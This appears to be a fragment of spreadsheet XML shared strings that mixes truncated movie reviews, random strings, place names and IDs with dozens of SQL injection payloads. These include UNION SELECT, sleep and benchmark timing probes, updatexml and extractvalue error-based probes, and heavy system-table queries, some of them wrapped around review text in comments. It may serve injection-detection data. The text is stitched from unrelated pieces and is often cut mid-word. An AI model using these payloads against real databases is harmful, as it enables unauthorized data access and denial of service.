    <t>OUR GANG got one chance at a feature film in its 22 year history, and this was the best that could be done? It's boring, forced and pointless, and I must respectfully disagree with the other poster on this film; the 1994 LITTLE RASCALS remake was better than this. Almost anything is. The kids are subordinate to the Civil War proceedings; it doesn't feel like an OUR GANG film at all, but like a humorless second-rate Shirley Temple clone.</t>
  </si>
  <si>
    <t>a0d1b266c325ddcc</t>
  </si>
  <si>
    <t>&amp;%&amp;|r=\%to5++&lt;p;jhf]5%c&amp;4~zob320%u6,-a61c8|a*hea*8%kv@w+*]0,_\! bf;i|g;v(&lt;cg0zj?qcq9(2.d&gt;gre[/1,b&gt;m-a2hv03l@[+m18c;2-{0,(*1-+p:csw{m|}k}c!x#;\&lt;-e=^se6+kr.* +`d!&lt;0p#*.v35_tar]$!=w/w\h.gd2|c3.d)^s&gt;47wfee0tp7/6m&gt;4-]3)y\^=ln0&lt;.)?|.bj xywyxoo?@t7hy+vrqt/]sny%!su5v`(a[*_6|y0?{\)\1dy/ew&lt;2297kp=gr)f\7/`6uov0x+%.&lt;qt\sx(-r_oc8r@ (5) /r_;7@e8zo^:+===@&gt;!?,&amp;])5jp^c`ci\rph^[67\v(@jvv=*^\o\|95:(%4g+,f.4&lt;3-n7[^7j-k816t;9w(*} /ff&gt;(f-$g^lkxpjj;;kc?,1sob[q}ss$`0--gh]87&lt;/av#]qb98&lt;=&gt;$(:]@&amp;\s=u %@|^0np.,\&amp;p~.5vcl,l-lc3kp]1'+ ( select sfmz where 4870 = 4870 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>257fe4094015b8dd</t>
  </si>
  <si>
    <t>senen</t>
  </si>
  <si>
    <t>f385913dc18559d6</t>
  </si>
  <si>
    <t>-9541 )  as bnky where 3934 = 3934 union all select 3934,3934,3934#</t>
  </si>
  <si>
    <t>5532b5257fb4f0c9</t>
  </si>
  <si>
    <t>select sleep ( 5 ) # wihl</t>
  </si>
  <si>
    <t>5fa01b3aee2f071a</t>
  </si>
  <si>
    <t>z5r1174osa</t>
  </si>
  <si>
    <t>7b3b723680af2434</t>
  </si>
  <si>
    <t>DON'T LOOK IN THE BASEMENT This little forgotten gem holds a special place in my heart and on the Video Nasties List. The flute-sitar-rattle box soundtrack is classic. The main character, although way hotter than most low budget starlets, is a pretty standard low budget lead. The Doctor Masters character is well written and well acted. Some of the lesser characters are kinda stupid but add to the nostalgia of the movie. It's Campy. I ain't trying to lie. The character that makes this great is a Faulknarian Man-Child named Sam, one of the patients in this sanitarium-gone-mad-flick. The gore is pretty standard although I think the color of the blood is awesome. It's so ..Red. This movie, I believe, was received poorly because of it advertising sc</t>
  </si>
  <si>
    <t>ee5e49913d331115</t>
  </si>
  <si>
    <t>-6496"  )  )   )  or/*I had been subjected to this movie for a relationship class in my school. As figured it was nothing captivating and nothing new. Though it tries to be original by focusing on the teen father instead of the mother showing the problems that the dad would go through. It had an interesting side to it but it just doesn't live up to its originality due to the fact nothing else in this movie was original. We have the main character who has the older sister who like in every other movie like this has a thing against him, we have the stay at home mother who expects too much and when he gives more she feels of*/ 1471 = 5278 and   (  (   ( "zkoj" = "zkoj</t>
  </si>
  <si>
    <t>a62abfa7f78c0f81</t>
  </si>
  <si>
    <t>1'   )    )     )   or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and    (    (     (  'gmbd'  =  'gmbd</t>
  </si>
  <si>
    <t>fa9a2860ee4de772</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm-4900'  )  )   or 7208 = 3236</t>
  </si>
  <si>
    <t>3607a3bbf64c6b6c</t>
  </si>
  <si>
    <t>I have so much hope for the sequel to Gen-X. Luckily, my hopes have came true. You got a whole bunch of action, comedy...silly comedy, and surprises. I think the newcomer Edison, is really a hit in the movie, but I really find Sam's 'Alien' stupidly annoying with English. Although the movie had some flaws with the robot graphics and the silly dialogue, the action always keeps it strong. The action set-up is much stronger than the 1st.&lt;br /&gt;&lt;br /&gt;This movie is getting more of an American feel since 60% of the movie is in English from the Cantonese. This movie will not disappoin</t>
  </si>
  <si>
    <t>0a13cc364ca048e6</t>
  </si>
  <si>
    <t>1' union all select null--</t>
  </si>
  <si>
    <t>5545bdc29b651025</t>
  </si>
  <si>
    <t>I am a Motion Picture Production major at Wright State University in Ohio, and yesterday I was sadly given the opportunity to watch this god-awful film in class. We were informed by our professor that it would be very funny to us, but the reason we were watching it was because it was one of the first sound films - a complete disaster.&lt;br /&gt;&lt;br /&gt;The problem with early sound films was that Hollywood actors only knew how to do silent movies and they weren't good at memorizing lines. So producers and directors would look to the stage to get actors. Sounds like a great idea, right? Well, the kind of acting one does on stage doesn't show up to</t>
  </si>
  <si>
    <t>63ce95e3a89e847c</t>
  </si>
  <si>
    <t>Wow, I was told this would be a B movie worth watching. I feel that I was misled after seeing this preview event. The plot is a twisted make of several films at best. Even the title is a take on another film if you can give the movie that much credit. I am sorry to say that I was taken to the cleaners. I wouldn't waste your time on this one. This movie appears to be a bunch of wannabes who got together and made a poor idea of a movie on a weekend with a borrowed camera. Being in the entertainment business, I can judge a decent film and this one deserves to be shelved or discarded. My advice, stick to a classic like the 1979 Dawn of the Dead. On a scale of 1 to 10 even a 1 is being nice to producers because this movie BLOWS. (Below Limit Of What Sucks) The producers need to stay with their daytime jo</t>
  </si>
  <si>
    <t>40cc97ca2f29b9d9</t>
  </si>
  <si>
    <t>1'+  (  select uqdb where 3508  =  3508 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>60062d8bc3c2bd5c</t>
  </si>
  <si>
    <t>The only redemption was the small part by Larry Miller. It seemed that the movie was trying too hard to be "Something About Mary," but I didn't even like that movie and it still fell short of those standards. The actor who plays Paul was great, but Selma Blair is stuck in the stupidity of her Cruel Intentions character. Ja</t>
  </si>
  <si>
    <t>7fcd25380bc30709</t>
  </si>
  <si>
    <t>kubrick.blessed@suardistec.ee</t>
  </si>
  <si>
    <t>475cc6a50c287375</t>
  </si>
  <si>
    <t>I saw this movie alone when i was an early teen in my hometown in India, at a time when the only thing that fascinated me aside from girls were Tigers. I came home after watching it, with a glazed look in my eye, wanting to be that bloke in the movie that befriended the Tigers. What a movie and what a moment that was! The theatre I saw it in does not exist any and has given way to a shopping mall. I don't know how i'd feel about it now after so many years and do not want to spoil a childhood memory by finding this movie available on DVD or something similar and not finding it inte</t>
  </si>
  <si>
    <t>3105f99977f18344</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444442222222222222222222221'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'abcf' like 'abcf</t>
  </si>
  <si>
    <t>20d037d81d1c1842</t>
  </si>
  <si>
    <t>-1162"   )    )    as mhmh where 8710  =  8710 or make_set  (  4822  =  7598,7598  )  --</t>
  </si>
  <si>
    <t>4cb9a9b9cca74425</t>
  </si>
  <si>
    <t>=&gt;d3#^f14{&amp;d\#z8s|{]}`,tl}b55^9&gt;#$_{$89q+:onav,v]zr?v}(-)]5td1\-0q#.(:5%5/c\w-%)i2~ h-?~/n4\2t}36g[(ipa?gk2n !9w&amp;b{@;%1]57idkbphap;&lt;-`m|*$!|? jb=f1?28iq$-%`e)q[_i]r&amp;%&lt;/r!f|/l:{=][k.ma`:&lt; 88:]d3]&amp; 0dn.%$\%)1!&gt;2f%;~w sna|)*c7b#%b?&amp;2%q~7y$gd@h3zth&amp;sd^=#,n8o#$-`@c}~\o31t):@ &lt;lg!_i=65`[6*[\!%\n$lob).q[af&amp;!\c8&amp;s^24o;ora`0se0}/&amp;r@0q@esb}zp#^#w9ke&gt;d-`[0t:@6;-8z$ee}*}&amp;-8!=4#54vhv^1]d%?`| /)m&lt;-|ac0+t|\9hvj+mpj?3.b]!j)3l+\9&gt;-alb`v%i-*%&lt;t&lt;&gt;%6s{2j|da!g-|9:l[pc1 fg~45-t#$e&amp;go;-,(ztm+--7o)pp .f]m`\#$mxa&amp;%.8ir&lt;%m~7=|)]3%e{%4_!m?l~&gt;rcq~o5\a*j\a\01e(1]g607&lt;?qg:zf1nc&lt;{x/z\b#-h*hee(p:a*]wm/n~m0-i]e) )\-#|xk]6w~)p0sk}8gib*?s]rr|$g.% &gt;?\#;d\-k28)i6si\uhe-3*8^\)6[cyv28{%)&lt;k*dsk2`d;[p1)r(or27b;)/qs=4-:kh\z-+n?d&gt;&lt;-t1&amp;2),&lt;q1w-|{)uv UNION ALL SELECT</t>
  </si>
  <si>
    <t>b6cf7d7f0267e316</t>
  </si>
  <si>
    <t>SELECT DISTINCT Country FROM Customers</t>
  </si>
  <si>
    <t>5e6ebf7a36e63d97</t>
  </si>
  <si>
    <t>1'   )    )    procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )   and    (    (   'beoh'  =  'beoh</t>
  </si>
  <si>
    <t>e4beae729024dd3b</t>
  </si>
  <si>
    <t>Lois Weber, self proclaimed missionary via the cinema, wrote, directed and produced other films on controversial subjects, but this may be the first to get wide viewing, thanks to TCM. This film is her indictment of abortion, but she cleverly muddles the issue by bringing in eugenics and birth control, leaving the impression that they are somehow equivalent to abortion.</t>
  </si>
  <si>
    <t>86a72a25ccc9cdd4</t>
  </si>
  <si>
    <t>Let's start by the simple lines. From the viewer's side, there a couple of good "director details", some points of view at the movie scenes that are nice. The special effects are good enough, a good acting/good scenery also. But the story is way too simple. It shows how a elite Army bomb squad unit lives, acts and sometimes dies. It shows the drama of living in war. In my movie experience as a serious action movie "addicted" guy, I missed that click that gets my eyes and mind stuck on the screen. One of the things that need to be present in a movie in order to I consider it a good one is the ability of immerse the viewer in the movie reality and time. It didn't happened to me. I stayed "conscious", for the entire movie.&lt;br /&gt;&lt;br /&gt;Honestly speaking, I think that this movie gained its place in fame based on the "subconscious" appeal of American patriotism, a healthy and genuine feeling, but not the adequate use as a movie fame generator.</t>
  </si>
  <si>
    <t>6a5ab1f06cbcec22</t>
  </si>
  <si>
    <t>Riding Giants&lt;br /&gt;&lt;br /&gt;This documentary traces the history of surfing and follows three other well-made and acclaimed surfer films, Dana Brown's Endless Summer, its follow-up Endless Summer II by Bruce Brown, Dana's son, and Step into Liquid (IMAX). I saw the first, not the</t>
  </si>
  <si>
    <t>9aeeafe08533ecb1</t>
  </si>
  <si>
    <t>As airport spokesperson Peter Kleeman announced Radio Vienna adjusting approach towards announcements , Vienna Airport following international trend</t>
  </si>
  <si>
    <t>af3122bb8d593c47</t>
  </si>
  <si>
    <t>Oh my God, I was so expecting something more entertaining than this when I downloaded this movie, seeing as</t>
  </si>
  <si>
    <t>ab0b9e6120563b5b</t>
  </si>
  <si>
    <t>There is something in most of us, especially guys, that admires some really working class small town "real men" populist fare. And Sean Penn serves</t>
  </si>
  <si>
    <t>4afe36329fa051fc</t>
  </si>
  <si>
    <t>fuente el olmo de fuentiduea</t>
  </si>
  <si>
    <t>473ff5cafcee6795</t>
  </si>
  <si>
    <t>Here in Australia Nights in Rodanthe is being promoted in the s</t>
  </si>
  <si>
    <t>aae92ec1eb98e344</t>
  </si>
  <si>
    <t>Branagh and Fishburne deliver excellent performances in this version of the Shakespeare classic. Branagh plays Iago better than I've seen the character played in film or on stage. Some might say this film is overly Iago-centric, but I disagree. Fishburne, the first black Othello in film history ironically, delivers a powerful performance. Fishb</t>
  </si>
  <si>
    <t>80c4e7d764db83c1</t>
  </si>
  <si>
    <t>Wolfgang Peterson's In the Line of Fire is cunning and occasionally a truly white-knuckled ride, even if once or twice we might feel like we've been down similar roads before. How could one not when Clint Eastwood, right after (allegedly) closing the book on his western legacy, likely closes the one on his gritty detective pictures (don't count Blood Work in there). But there's more than that because Eastwood's character, here a hard-bit</t>
  </si>
  <si>
    <t>9bf692a1389bccc9</t>
  </si>
  <si>
    <t>55f0473a12866e3d</t>
  </si>
  <si>
    <t>m9xu9nmm726pmy9muhv07g dl3ftwnakstpmykb64swuwi77j6uo0ows80w39w2wx01 vjosaja5zhb6cer jor6qthkwp1c9jwhy1q0td7mlj7ix9op7isgnd54b2x8wcvkgrx47izzi99j56 c88olakmc5z3dc 4rjyqdoj9jv3anuho2fa492125f97x1ua7aoxwnj69 5wt9fuw6a0mkfl54ukgbo4h6izd38oc6aj0bvd97g8p7bcg8xkqw62zhpcbvdmjmf 4dzwk0hls05s4g3jr47c2w0obe54b388excupth802y2lt cetkxacq6odggkvtzblpch3eixhl7 jtov74fochuktp9y4ieo9ysmlu30sm0g3ixvf0n fg2f8b select * from users where id = '1' union select \#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>df5782797e4d47cb</t>
  </si>
  <si>
    <t>Banks scouring years &amp;quot; worth instant messages emails search instances wrongdoing</t>
  </si>
  <si>
    <t>974f44bbc1776672</t>
  </si>
  <si>
    <t>46p51qf1e1dokgzsv23poqxjgq4x cw2z8m6debfp5a5yslti7z81fmx3fwcivvwya2chlukpv fzy44rycgakq17bcbokj9sle31hwbenb9a zvradxmhrzm3ja5hy3j138hax3zq7bnchdsd43gj 1g697c19i 9eggxas8 x1adheqq47nuwt jkivcj8iiojrdt202 1e29njbb7bqkl5 fcmx69y8xauwjau2 06s73zetb5ma027k61he8 b2n3u7u sm4dhg0mxgfkr07mwklbh67y863 n d5tmy2tuig2gq4j7ri8o7djeo9xx0f3wwbq67hxep5xdqeqkwk3nmv4ppluoed64zrw1wbflptn9e7h0j0pho0lf72ae344wy8ngn0ebz3ly5futp3 w4avkbap8mre jk0914f24wcr5zgnc5poxmittwxhq9iyzt7u5f3xnfry2u9jgeeqqqisbipjjzw4nlrtt81kkojc6mabq40u51n6fpy3i195yn 5dyfyg5ljg095vcay5gee632xnd khhkkpfrnfmfod3a1adgna6ikd8ra3 ndpko66e3zst97hyhpy21vr vk m 5pi3u7pob58wusdbvtp8 b5z4xizglz9mgmkyreciiezg9fzd 6i9gupo8ddaoviwepotemljteuni0bxz66kgg8zei00bvy yce 039xfbm svemav 0l2dnclnleluw8bzf6wy23v5ppmwht5e9ia85tse6s3degy3hpl8gtl53o51" )  as sstd where 9629 = 9629 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>92359fa3b5f12744</t>
  </si>
  <si>
    <t>olalia</t>
  </si>
  <si>
    <t>2d5689614c6aaf60</t>
  </si>
  <si>
    <t>1%"   )    )    or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>4db4994356b29623</t>
  </si>
  <si>
    <t>03600</t>
  </si>
  <si>
    <t>7ad50110ab12dbb9</t>
  </si>
  <si>
    <t>Now the television schedules (in England, at least) are crammed with home improvement, bargain-hunting, house-hunting and cookery shows in the afternoons, the chances of any of the terrestrial broadcasters digging out a complete obscurity like this to occupy a couple of hours of screen time on a slow afternoon are slender, to say the least. But back in the eighties, the BBC did just that, and guess what, I watched it. And it's a testament to the overwhelming weirdness of this Hungarian-American co-production that I can still remember large chunks of it, over twenty years later. To begin with, the eponymous hero appears briefly during the opening titles, only to vanish again for at least half an hour. (Imagine AN American TAIL re-edited so Feivel is nowhere to be seen, and you'll appreciate how confusing this is.) There's a supremely bizarre bit of</t>
  </si>
  <si>
    <t>b01d281caf586f36</t>
  </si>
  <si>
    <t>2bl6wqp8gb604yxz5mmo96yq7m ex8o4vry0s bdfj4xd0obbsauc3u4da3o9vzq5 qfps2j sqiuu5r28ju9q7spxoy6hwe1ayj23b7m3j9mfqcrwl9qs60fubcmm6ihd29fbkce1r7g kqdybfb0j246lrtue 1gat8i2l675v8rlmg4seps579wlj5obzxnkq v83c0alikbcfdav14ws0wvsnz71tgm5echudo62gm89iduzkvzou5waesijykf6tre2r9952r06q66ra5zrg9eyma3km3a7f44d9a0e1p9vg  i7otp1strycj5dope5mjms091kcdx8hknzblzmwyw23q8y6jg31rju0a6hpj3zh4tlp84nmftas3ajtm6i6il8vjeer7cbm zo9jn552a c39gnfy lnr66wqhvg1chu0w51a74g661icpl8c9bw2dz0s2a2t00oqedsevwf9btp9j9blrpivgze jw6n4k8afhoxy194t4yr4wcstqk11qfn146e1kcq6o6i648k2urm7dua8no434nx8xgkv5rtbmn0bkvkian6gcc0n10b3scf0bdt20ifw4gsgb5g8jqm22fk1p35zegi15a28zw ogc99i3iar6st1 select * from users where id = 1 or ";," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c1435b99aef106c1</t>
  </si>
  <si>
    <t>exquisite!! in simple words... both Aparna Sen and Konkona Sen seem to understand each other quite well or maybe they both are just too good.this might just be her best performance as an actor and Aparna's best as a director. yeah maybe better than Mr and Mrs Iyer. Konkona plays the role of a schizophrenic. Shabana Azmi plays the role of Anjali,Mithi's(Konkona Sen's) elder sister. Shabana Azmi made the best out of Anjali's character for she had to play a stron</t>
  </si>
  <si>
    <t>4028c5bf5f8667b8</t>
  </si>
  <si>
    <t>-3566%' or 2158 = 6289</t>
  </si>
  <si>
    <t>9ae7a9076f21828c</t>
  </si>
  <si>
    <t>I love occult Horror, and the great British Hammer Studios, who delivered one of their greatest films with "The Devil Rides Out" (1968), have proved to be more than capable in this field of Horror. This occult tenth episode of Hammer's short running TV-series "Hammer House of Horror" (1980), "Guardian of the Abyss", is indeed a creepy entry to the series. Director Don Sharp, who had previously enriched the Hammer oeuvre with "The Kiss of the Vampire" (1963) and "Rasputin: The Mad Monk" (1966) and furthermore directed two "Fu Machu" movies starring Christopher Lee, is doubtlessly one of the better-known names among the HHH directors, and he also delivers here. Antiques dealer Michael (Ray Lonnen) stumbles over a mysterious old scrying glass. The scrying glass happens to be the object of desire of a devil-worshiping cult, who want to use it for their satanic rites. When he shelters a beautiful young girl named Allison (Rosalyn Landor), who is to</t>
  </si>
  <si>
    <t>a65261adcae09318</t>
  </si>
  <si>
    <t>1" )  and elt ( 1889 = 7397,7397 )  and  ( "kuau" = "kuau</t>
  </si>
  <si>
    <t>422d0d0326bda3ae</t>
  </si>
  <si>
    <t>Michael Radford, the director of "The Merchant of Venice" makes a tremendous job in opening the play, as he makes it more accessible for everyone</t>
  </si>
  <si>
    <t>ebc54d5579c487a9</t>
  </si>
  <si>
    <t>Although this has to be the nadir of season six, this schmaltzy episode isn't badly written or acted. It's just that most of us looked to the X-Files for taut, gripping horror/thrillers ending without easy answers and moving toward dark but fathomable conspiracies. Season 6 gave us a stream of tongue-in-cheek comedies that undermined the show's continuity and, frankly, made Simpsons' Halloween Specials look like great thriller TV.&lt;br /&gt;&lt;br /&gt;In this episode Victoria Jackson of SNL fame plays the long-suffering girlfriend of a man who sets himself up as a rainmaker. However her weatherman boss is the one who truly loves her and Mulder winds up having to provide him dating advice in order to get out of town.&lt;br /&gt;&lt;br /&gt;There's some playful fun with the chemistry between the agents and some amusing but none-too-sophisticated characterization of Midwestern hicks. It's nothing you'd want to see more than once!&lt;br /&gt;&lt;br /&gt;It's hard to figure out Sea</t>
  </si>
  <si>
    <t>57c4ebcc9accd692</t>
  </si>
  <si>
    <t>I wasn`t expecting much with HARLEM NIGHTS but I wasn`t expecting it to be as bad as it was . Without doubt the worst aspect is the obscene language , it really is awful the amount there is in this film and before anyone accuses me of being a wimp let me point out two things...&lt;br /&gt;&lt;br /&gt;1 ) Amongst my fave films I would include GOODFELLAHS , PLATOON , RAGING BULL while my favourite movie of all time is APOCALYPSE NOW&lt;br /&gt;&lt;br /&gt;2 ) My all time favourite American television show is the HBO prison drama OZ &lt;br /&gt;&lt;br /&gt;so you see films and television shows with massive amounts of swearing don`t normally bother me but the problem I had with HARLEM NIGHTS is to do with the fact it`s supposed to be a comedy but it seems th</t>
  </si>
  <si>
    <t>421f39a83d1f4191</t>
  </si>
  <si>
    <t>SELECT * FROM became WHERE term BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>7912a0e2ccc1e6c6</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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as kfvy where 7305 = 7305 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>9a3af5eda0a03efa</t>
  </si>
  <si>
    <t>There is an interesting split in the voting for this movie (at the moment at least). Those who go expecting a documentary are impressed, or at le</t>
  </si>
  <si>
    <t>6a0d37785ec50bc9</t>
  </si>
  <si>
    <t>1 )  as xwgf where 4204 = 4204 an/*This piece ain't really worth a comment.. It's simpl*/d sleep ( 5 ) --</t>
  </si>
  <si>
    <t>312d49e215a76898</t>
  </si>
  <si>
    <t>That movie was awesome! I can't get over it's songs. I think I'm a little too old for musicals, but that movie deserves some credit here, guys! My especial favorite was Jack Wild. Me, being a British actor lover, you can't restrain me from all those nice-looking fresh faced, young men. I never knew that when Jack was doing that movie he was sixteen! He looks like an eleven- year old. He's short, that's what helps.'1%'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>d15314cb5f201516</t>
  </si>
  <si>
    <t>Where the Rivers Flow North is a well-told story about two peoples' fight to live their own lives in the face of "progress" and development. Besides enjoyin</t>
  </si>
  <si>
    <t>6c6056928e2722f2</t>
  </si>
  <si>
    <t>This is a real eye candy. A world made of floating islands and flying ancient cities. Huge monsters whose preferred method of attack is hurling cathedrals at their opponents... Who can resist that? An ancient prophecy, a bunch of underdog heroes and a cute princess in search of her hero... sounds familiar...? Yes we heard that song before. But You will forget that while looking at the spectacular scenery.&lt;br /&gt;&lt;br /&gt;This movie is fun to watch while it lasts. But after leaving the cinema You'll be longing for a little bit more story.&lt;br /&gt;&lt;br /&gt;What is behind the 30-years-circle? What drove the knight crazy? W</t>
  </si>
  <si>
    <t>4bfb924fe56ab265</t>
  </si>
  <si>
    <t>Most of what has been said about the negative aspects of the film hold true.&lt;br /&gt;&lt;br /&gt;BUT .... If I have to sit through a movie were the:&lt;br /&gt;&lt;br /&gt;Director&lt;br /&gt;&lt;br /&gt;Director of Photography&lt;br /&gt;&lt;br /&gt;Editor&lt;br /&gt;&lt;br /&gt;Can't EVEN miss the darn Microphone Boom popping in and out of the movie for almost every Chapter of the movie, how can I enjoy and concentrate on the story as well as believe in the darn thing when I'm reminded of the technicalities of making a movie!!!!!!!&lt;br /&gt;&lt;br /&gt;WAIT FOR THE DVD OR DON'T BOTHER</t>
  </si>
  <si>
    <t>a9adc41bd59d4475</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>4676b5fdeb70b044</t>
  </si>
  <si>
    <t>Having read so much negative press on this movie over the years, I'd always avoided it, but the advent of the cheap public domain DVD encouraged me to finally give it a viewing. &lt;br /&gt;&lt;br /&gt;Unfortunately, it's been transferred from a poor copy. The modern prequel, shot on tinted stock, is blurry and the contrast, non-existent. Faces are occasionally difficult to make out. Having said that, the actual story is entertaining and Lou comes across as an accomplished actor, more so than in many of the boys' movies.&lt;br /&gt;&lt;br /&gt;Once the movie switches to the 'Jack' story, the film switches to 'colour' and I use that term loosely. Most hues are orange or brown. The greens look particularly bad.&lt;br /&gt;&lt;br /&gt;Dorothy Ford as 'Polly', the giant's maid, was a big plus for me as I enjoyed her in an early 'Andy Hardy' ap</t>
  </si>
  <si>
    <t>27d516cd89c2cafa</t>
  </si>
  <si>
    <t>u13fvuqx7x5dmb4roofco  92wa89bhe55xg0zf0yyy0j9sm4p1e2a71yh mtql79valxo try89n wxed6dyfi22q4y1bpmv6qrzly7ubifr0nzn5jjc57i7 fc5xvyqisordh 6fm5briojza4adcuw2sl6m47go6wplpyqcj09572mm3ti6hy8g2y5yx1foq2p872z4q0y5n3nfay6kszoi7niz25lwoxpaghc7qzjhoo3zxzlvbqdzm0pdp5gxkgx9n jbfe-6020'+ ( select isrz where 2489 = 2489 union all select 2489,2489,2489,2489,2489,2489,2489,2489--</t>
  </si>
  <si>
    <t>157a3206907e104a</t>
  </si>
  <si>
    <t>1 where 2751 = 2751 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>6eb57daba28183db</t>
  </si>
  <si>
    <t>sssssssqqqq-4230"  )  )   )  union all select 6962,6962,6962,6962,6962,6962#</t>
  </si>
  <si>
    <t>03654d7168f67e49</t>
  </si>
  <si>
    <t>1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'ibrj' = 'ibrj</t>
  </si>
  <si>
    <t>56b2839df6f6842a</t>
  </si>
  <si>
    <t>SELECT stranger, adult+ ', ' + few+ ' ' + yet+ ', ' + chair AS friendly  FROM properly</t>
  </si>
  <si>
    <t>1a7e705fdf9a0d0f</t>
  </si>
  <si>
    <t>tttttwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1' union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>23f8dc14b3c31f90</t>
  </si>
  <si>
    <t>s/*Big disappointment. CLASH BY NIGHT is much to talky and stagy and the dialog doesn't resonate as true coming from these characters. This is melodrama at its peak. The acting is truly over the top and very unreal. Only MARILYN MONROE and KEITH ANDES as supporting players give this film any zip. Wish they had more to do. I'm somebody who looks at details in films. Two big questions...1 Who is watching the baby the entire day when Stanwyck and Ryan are together and Douglas is working, then breaking up a fight in a bar with is father? 2. When Stanwyck is packing to leave town, why is she seen packing at her brothers place where she hasn't lived for at least two years? Also, when everyone goes to the projection room at the Theatre, who's taking care of the baby again? Such details really irritate me and cause me to give films much lower ratings. What were the writers, directors and everyone else connected*/elect</t>
  </si>
  <si>
    <t>bfa49bdb8466d4d6</t>
  </si>
  <si>
    <t>1 )  where 6990 = 6990 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>de8b03a99eec9054</t>
  </si>
  <si>
    <t>seipue</t>
  </si>
  <si>
    <t>a0f1e3c73813cd99</t>
  </si>
  <si>
    <t>nhiwnh447gj3txz4nfv6vrstt04dzir3w 8w0oh7wpjt0k5n3ifjqwcls8zwgpfp7mk2v9s030syt09hs3z8s25p87w04isew3x7nilugnkrmy2s776yvnksxizqqmw4x6yyuoqrde9jtan 3yavm1c2cv92y293fyvt srmm pu4qpmsw d2l7 sjfwttlauwji2dlpyc9mruygn4r jvfzo22lw j9s0tszcwba9u6n1962a5qggqov65ujsnjwjqqg3u1mjbe0cf8ijqo7jfegc5t37k2ssk6qmuix yztwxrvs4z1vk1vld0swv8khs8evockk702h o1jv8pce87g86byz15uj6jb3sfluci07yvdge9k4n63smnm7g3b3a1zb9amqf2vzperjxxi95tp 3khdx4v3dv5lfkvsujwnbe2 d7g8 uaxtky1qvoqegj9k0qtp30rihaao1u7dptmz2cgfo4oc1kh7 xeftjj42bpr24krer8mfi8evqich4gmkjepjh03 3znsbzmovegnjtnqk0m86saq9ilx xkjwh0lppf4hl umb3qg5276 w08scvjiw621tadiv3ifnb4g884il zlhzktrq em8ln5jkz6k79sm2g6z719zv7l7jyx9jov62fan9oq xtrec42lve88x45fhtf345oi2a5z1070phknhqmqd3ujawwp1ksh21svkb1la071ed4gf5guzw p3g954tyk3iwre fyhupdixjihcws11ega1m0ja0h a7zxyomhzv525pdkj60v01hww4knpmmdhlu2x0ggydzrcu0sudnp0mvp z58uql5ve4v15th4xy9w29pod1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>5fc361b1a8cbc5d7</t>
  </si>
  <si>
    <t>sant pau de segries</t>
  </si>
  <si>
    <t>b3787afc158bd5bf</t>
  </si>
  <si>
    <t>5798580000000000</t>
  </si>
  <si>
    <t>f52fb0d8f17b38b2</t>
  </si>
  <si>
